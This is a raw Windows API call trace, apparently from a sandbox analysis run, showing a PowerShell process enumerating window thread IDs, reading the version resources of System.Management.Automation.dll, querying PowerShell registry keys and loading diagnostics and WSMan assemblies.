	[0506.118] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x44c
	[0506.118] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x778
	[0506.119] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x460
	[0506.119] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x558
	[0506.119] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.119] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.119] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x10c4
	[0506.119] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x128c
	[0506.119] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x16e8
	[0506.119] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x16cc
	[0506.119] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x274
	[0506.119] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x10e0
	[0506.120] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x10cc
	[0506.120] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x10c0
	[0506.120] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x10d0
	[0506.120] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1198
	[0506.120] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1080
	[0506.120] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1074
	[0506.120] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x106c
	[0506.120] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1474
	[0506.120] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1414
	[0506.120] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xbd0
	[0506.120] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x550
	[0506.121] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xa38
	[0506.121] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x16d0
	[0506.121] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x16d4
	[0506.121] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x15bc
	[0506.121] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x15a0
	[0506.121] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x159c
	[0506.121] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1598
	[0506.121] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1594
	[0506.121] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1590
	[0506.121] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x158c
	[0506.122] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1588
	[0506.122] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1584
	[0506.122] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1580
	[0506.122] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x157c
	[0506.122] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1488
	[0506.122] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1404
	[0506.122] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x11b8
	[0506.122] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xbd4
	[0506.123] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xe0c
	[0506.123] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xd30
	[0506.123] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xe70
	[0506.123] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x13b8
	[0506.123] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xe20
	[0506.123] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xe2c
	[0506.123] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xe00
	[0506.123] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xe04
	[0506.123] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xc94
	[0506.123] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x13b0
	[0506.124] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x13ac
	[0506.124] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x13a8
	[0506.124] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1374
	[0506.124] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x132c
	[0506.124] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1328
	[0506.124] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x12d0
	[0506.124] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x12cc
	[0506.127] WerSetFlags () returned 0x0
	[0506.806] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0506.806] CoTaskMemFree (pv=0x0) 
	[0506.807] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x28e128, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x28e120 | out: pulNumLanguages=0x28e128, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x28e120) returned 1
	[0506.807] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x28e128, pwszLanguagesBuffer=0x2d56588, pcchLanguagesBuffer=0x28e120 | out: pulNumLanguages=0x28e128, pwszLanguagesBuffer=0x2d56588, pcchLanguagesBuffer=0x28e120) returned 1
	[0506.812] CoTaskMemAlloc (cb=0x24) returned 0x488250
	[0506.812] GetUserDefaultLocaleName (in: lpLocaleName=0x488250, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0506.813] CoTaskMemFree (pv=0x488250) 
	[0506.835] CoTaskMemAlloc (cb=0x104) returned 0x3d3200
	[0506.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d3200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0506.835] CoTaskMemFree (pv=0x3d3200) 
	[0506.837] CoTaskMemAlloc (cb=0x104) returned 0x3d3200
	[0506.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d3200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0506.838] CoTaskMemFree (pv=0x3d3200) 
	[0506.840] CoTaskMemAlloc (cb=0x104) returned 0x3d3200
	[0506.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d3200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0506.840] CoTaskMemFree (pv=0x3d3200) 
	[0507.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0507.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0507.415] SetErrorMode (uMode=0x1) returned 0x1
	[0507.415] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x28dda0 | out: lpFileInformation=0x28dda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0507.415] SetErrorMode (uMode=0x1) returned 0x1
	[0507.415] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x28e010 | out: lpdwHandle=0x28e010) returned 0x94c
	[0507.417] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d59e18 | out: lpData=0x2d59e18) returned 1
	[0507.418] VerQueryValueW (in: pBlock=0x2d59e18, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28df88, puLen=0x28df80 | out: lplpBuffer=0x28df88*=0x2d59eb4, puLen=0x28df80) returned 1
	[0507.418] VerQueryValueW (in: pBlock=0x2d59e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x28def8, puLen=0x28def0 | out: lplpBuffer=0x28def8*=0x2d59f90, puLen=0x28def0) returned 1
	[0507.418] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0507.418] CoTaskMemAlloc (cb=0x2e) returned 0x3e9250
	[0507.418] lstrcpyW (in: lpString1=0x3e9250, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0507.418] CoTaskMemFree (pv=0x3e9250) 
	[0507.418] VerQueryValueW (in: pBlock=0x2d59e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x28def8, puLen=0x28def0 | out: lplpBuffer=0x28def8*=0x2d59fe4, puLen=0x28def0) returned 1
	[0507.418] lstrlenW (lpString="System.Management.Automation") returned 28
	[0507.418] CoTaskMemAlloc (cb=0x3c) returned 0x4912c0
	[0507.418] lstrcpyW (in: lpString1=0x4912c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0507.418] CoTaskMemFree (pv=0x4912c0) 
	[0507.419] VerQueryValueW (in: pBlock=0x2d59e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x28def8, puLen=0x28def0 | out: lplpBuffer=0x28def8*=0x2d5a040, puLen=0x28def0) returned 1
	[0507.419] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0507.419] CoTaskMemAlloc (cb=0x20) returned 0x48e0e0
	[0507.419] lstrcpyW (in: lpString1=0x48e0e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0507.419] CoTaskMemFree (pv=0x48e0e0) 
	[0507.419] VerQueryValueW (in: pBlock=0x2d59e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x28def8, puLen=0x28def0 | out: lplpBuffer=0x28def8*=0x2d5a080, puLen=0x28def0) returned 1
	[0507.419] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0507.419] CoTaskMemAlloc (cb=0x44) returned 0x4912c0
	[0507.419] lstrcpyW (in: lpString1=0x4912c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0507.419] CoTaskMemFree (pv=0x4912c0) 
	[0507.419] VerQueryValueW (in: pBlock=0x2d59e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x28def8, puLen=0x28def0 | out: lplpBuffer=0x28def8*=0x2d5a0e8, puLen=0x28def0) returned 1
	[0507.419] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0507.419] CoTaskMemAlloc (cb=0x76) returned 0x4271e0
	[0507.419] lstrcpyW (in: lpString1=0x4271e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0507.419] CoTaskMemFree (pv=0x4271e0) 
	[0507.419] VerQueryValueW (in: pBlock=0x2d59e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x28def8, puLen=0x28def0 | out: lplpBuffer=0x28def8*=0x2d5a184, puLen=0x28def0) returned 1
	[0507.420] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0507.420] CoTaskMemAlloc (cb=0x44) returned 0x4912c0
	[0507.420] lstrcpyW (in: lpString1=0x4912c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0507.420] CoTaskMemFree (pv=0x4912c0) 
	[0507.420] VerQueryValueW (in: pBlock=0x2d59e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x28def8, puLen=0x28def0 | out: lplpBuffer=0x28def8*=0x2d5a1e8, puLen=0x28def0) returned 1
	[0507.420] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0507.420] CoTaskMemAlloc (cb=0x58) returned 0x3d6720
	[0507.420] lstrcpyW (in: lpString1=0x3d6720, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0507.420] CoTaskMemFree (pv=0x3d6720) 
	[0507.420] VerQueryValueW (in: pBlock=0x2d59e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x28def8, puLen=0x28def0 | out: lplpBuffer=0x28def8*=0x2d5a264, puLen=0x28def0) returned 1
	[0507.420] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0507.420] CoTaskMemAlloc (cb=0x20) returned 0x48e0e0
	[0507.420] lstrcpyW (in: lpString1=0x48e0e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0507.420] CoTaskMemFree (pv=0x48e0e0) 
	[0507.420] VerQueryValueW (in: pBlock=0x2d59e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x28def8, puLen=0x28def0 | out: lplpBuffer=0x28def8*=0x2d59f0c, puLen=0x28def0) returned 1
	[0507.420] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0507.420] CoTaskMemAlloc (cb=0x66) returned 0x48d280
	[0507.420] lstrcpyW (in: lpString1=0x48d280, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0507.421] CoTaskMemFree (pv=0x48d280) 
	[0507.421] VerQueryValueW (in: pBlock=0x2d59e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x28def8, puLen=0x28def0 | out: lplpBuffer=0x28def8*=0x0, puLen=0x28def0) returned 0
	[0507.421] VerQueryValueW (in: pBlock=0x2d59e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x28def8, puLen=0x28def0 | out: lplpBuffer=0x28def8*=0x0, puLen=0x28def0) returned 0
	[0507.421] VerQueryValueW (in: pBlock=0x2d59e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x28def8, puLen=0x28def0 | out: lplpBuffer=0x28def8*=0x0, puLen=0x28def0) returned 0
	[0507.421] VerQueryValueW (in: pBlock=0x2d59e18, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28dec8, puLen=0x28dec0 | out: lplpBuffer=0x28dec8*=0x2d59eb4, puLen=0x28dec0) returned 1
	[0507.421] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0507.421] VerLanguageNameW (in: wLang=0x0, szLang=0x419ce0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0507.421] CoTaskMemFree (pv=0x419ce0) 
	[0507.421] VerQueryValueW (in: pBlock=0x2d59e18, lpSubBlock="\\", lplpBuffer=0x28df18, puLen=0x28df10 | out: lplpBuffer=0x28df18*=0x2d59e40, puLen=0x28df10) returned 1
	[0507.432] CoTaskMemAlloc (cb=0x104) returned 0x3d3200
	[0507.432] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d3200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.432] CoTaskMemFree (pv=0x3d3200) 
	[0507.438] CoTaskMemAlloc (cb=0x104) returned 0x3d3200
	[0507.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d3200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.439] CoTaskMemFree (pv=0x3d3200) 
	[0507.444] lstrlenW (lpString="䅁") returned 1
	[0507.453] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28dde8 | out: phkResult=0x28dde8*=0x30c) returned 0x0
	[0508.033] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x28ddd8 | out: phkResult=0x28ddd8*=0x1d0) returned 0x0
	[0508.033] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28de68 | out: phkResult=0x28de68*=0x1d8) returned 0x0
	[0508.037] RegQueryValueExW (in: hKey=0x1d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ddac, lpData=0x0, lpcbData=0x28dda8*=0x0 | out: lpType=0x28ddac*=0x1, lpData=0x0, lpcbData=0x28dda8*=0x56) returned 0x0
	[0508.038] CoTaskMemAlloc (cb=0x5a) returned 0x48d210
	[0508.038] RegQueryValueExW (in: hKey=0x1d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28dd7c, lpData=0x48d210, lpcbData=0x28dd78*=0x56 | out: lpType=0x28dd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28dd78*=0x56) returned 0x0
	[0508.038] CoTaskMemFree (pv=0x48d210) 
	[0508.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0508.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0508.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0508.071] CoTaskMemAlloc (cb=0x104) returned 0x3d3200
	[0508.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d3200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.071] CoTaskMemFree (pv=0x3d3200) 
	[0511.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x28d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0511.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x28d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0512.788] CoTaskMemAlloc (cb=0x104) returned 0x43dae0
	[0512.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43dae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.788] CoTaskMemFree (pv=0x43dae0) 
	[0512.789] CoTaskMemAlloc (cb=0x104) returned 0x49ce10
	[0512.789] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49ce10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.789] CoTaskMemFree (pv=0x49ce10) 
	[0513.412] CoTaskMemAlloc (cb=0x104) returned 0x49ce10
	[0513.412] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49ce10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0513.412] CoTaskMemFree (pv=0x49ce10) 
	[0513.414] CoTaskMemAlloc (cb=0x104) returned 0x49ce10
	[0513.414] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49ce10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0513.414] CoTaskMemFree (pv=0x49ce10) 
	[0513.414] CoTaskMemAlloc (cb=0x104) returned 0x49ce10
	[0513.414] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49ce10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0513.414] CoTaskMemFree (pv=0x49ce10) 
	[0517.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x28d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0517.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x28d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0517.769] CoTaskMemAlloc (cb=0x104) returned 0x49ce10
	[0517.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49ce10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0517.769] CoTaskMemFree (pv=0x49ce10) 
	[0517.772] CoTaskMemAlloc (cb=0x104) returned 0x49ce10
	[0517.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49ce10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0517.772] CoTaskMemFree (pv=0x49ce10) 
	[0521.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
